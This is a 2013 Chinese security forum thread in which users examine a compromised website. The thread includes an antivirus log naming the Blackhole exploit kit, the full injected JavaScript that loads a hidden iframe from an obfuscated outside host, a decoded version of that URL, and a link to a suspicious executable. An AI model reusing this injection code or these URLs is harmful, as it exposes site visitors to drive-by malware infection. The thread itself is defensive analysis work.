查看: 2011|回复: 6
收起左侧

[已鉴定] http://perso.menara.ma/hse/【挂马 by 哀酱】

 关闭 [复制链接]
墨家小子
发表于 2013-4-11 16:28:48 | 显示全部楼层 |阅读模式
本帖最后由 蓝核 于 2013-4-11 17:37 编辑

2013/4/11        16:27:02        已删除 (清理失败,因为该检测项不可清理)         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\42YH25IS\hse[1].htm\00000455.js        JS/Exploit-Blacole.da (特洛伊)
哀酱俏佳人
发表于 2013-4-11 16:55:33 | 显示全部楼层
if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("
<iframe src='http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%
67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775' width='10' heigh
t='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', '
http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%6
9%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}




蓝核
发表于 2013-4-11 17:36:13 | 显示全部楼层
哀酱俏佳人 发表于 2013-4-11 16:55

哀酱,再用ESC解马一下试试
蓝核
发表于 2013-4-11 17:36:43 | 显示全部楼层
  1. http://qerfhgkadhsfukhertgrpotgjpo
  2. 9dfg.ce.ms/main.php?page=b5a87c34230be775
复制代码
哀酱俏佳人
发表于 2013-4-11 18:39:08 | 显示全部楼层
蓝核 发表于 2013-4-11 17:36
哀酱,再用ESC解马一下试试

看一下这个文件有没有问题


http://212.217.0.30/ws_ftple.exe



蓝核
发表于 2013-4-11 18:44:43 | 显示全部楼层
哀酱俏佳人 发表于 2013-4-11 18:39
看一下这个文件有没有问题

VT安全,火眼我没有激活码
哀酱俏佳人
发表于 2013-4-11 18:48:49 | 显示全部楼层
蓝核 发表于 2013-4-11 18:44
VT安全,火眼我没有激活码

只释放了一个临时文件。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 16:46 , Processed in 0.117367 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表